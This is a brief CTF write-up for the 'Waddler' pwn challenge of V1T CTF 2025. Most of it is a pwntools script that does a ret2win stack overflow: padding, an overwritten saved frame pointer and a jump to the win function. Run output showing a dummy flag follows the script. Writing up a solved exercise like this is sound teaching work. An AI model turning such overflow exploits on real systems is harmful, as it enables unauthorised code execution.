tsune Help

2025-1

Challenge information

  • CTF: V1T CTF 2025

  • Challenge: Waddler

  • Solves: 387

  • Description: Poke it the right way and it hums back something useful.

  • Time wasted solving: 3 min

Writeup

AAH, obviously ret2win.

```python
from pwn import *
from icecream import ic
import sys

e = ELF("chall", checksec=False)
libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
ld = ELF("/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", checksec=False)

# Connection string for the challenge instance ("nc host port" or a URL).
nc = "nc 127.0.0.1 9999"
if "nc" in nc:
    HOST = nc.split(" ")[1]
    PORT = int(nc.split(" ")[2])
if "http" in nc:
    from urllib.parse import urlparse
    HOST = urlparse(nc).hostname
    PORT = urlparse(nc).port

dbg = 1
g_script = """
#set max-visualize-chunk-size 0x300
"""

context.binary = e
# Any extra command-line argument selects the remote target;
# otherwise run the local binary, optionally under gdb.
if len(sys.argv) > 1:
    io = remote(host=HOST, port=PORT)
else:
    io = e.process()
    if dbg:
        gdb.attach(io, g_script)

# Short aliases for the pwntools tube API.
s = lambda b: io.send(b)
sa = lambda a, b: io.sendafter(a, b)
sl = lambda b: io.sendline(b)
sln = lambda b: io.sendline(str(b).encode())
sla = lambda a, b: io.sendlineafter(a, b)
r = lambda: io.recv()
ru = lambda b: io.recvuntil(b)
rl = lambda: io.recvline()
pu32 = lambda b: u32(b.ljust(4, b"\0"))
pu64 = lambda b: u64(b.ljust(8, b"\0"))
hlog = lambda i: print(f"[*]{hex(i)}")
fsp = lambda b: f"%{b}$p".encode()
shell = lambda: io.interactive()

payload = b""


def rst():
    """Clear the global payload buffer."""
    global payload
    payload = b""
    log.info("***PAYLOAD RESET***")


def pay(*args, **kwargs):
    """Append to the payload: bytes as-is, str encoded, int packed with p64."""
    global payload
    payload += b"".join(
        [a if type(a) == bytes else (a.encode() if type(a) == str else p64(a)) for a in args]
    )


pay(
    b"A" * 0x40,                     # padding, 0x40 bytes
    0x0000000000405000 - 0x20,       # next qword (saved rbp slot)
    0x040129b,                       # final qword (return address, the ret2win target)
)
sl(payload)
shell()
```
```
[~/dc/ctf/v1t/Waddler]$python3 e.py
[+] Starting local process '/home/tsuneki/dc/ctf/v1t/Waddler/chall': pid 17703
[*] running in new terminal: ['/usr/bin/gdb', '-q', '/home/tsuneki/dc/ctf/v1t/Waddler/chall', '-p', '17703', '-x', '/tmp/pwnlib-gdbscript-y8djc5f3.gdb']
[+] Waiting for debugger: Done
[*] Switching to interactive mode
The Ducks are coming!
FLAG: FLAG{DUMMY_FLAG_FOR_TESTING}
[*] Got EOF while reading in interactive
$
[*] Interrupted
[*] Process '/home/tsuneki/dc/ctf/v1t/Waddler/chall' stopped with exit code -11 (SIGSEGV) (pid 17703)
```
Last modified: 04 November 2025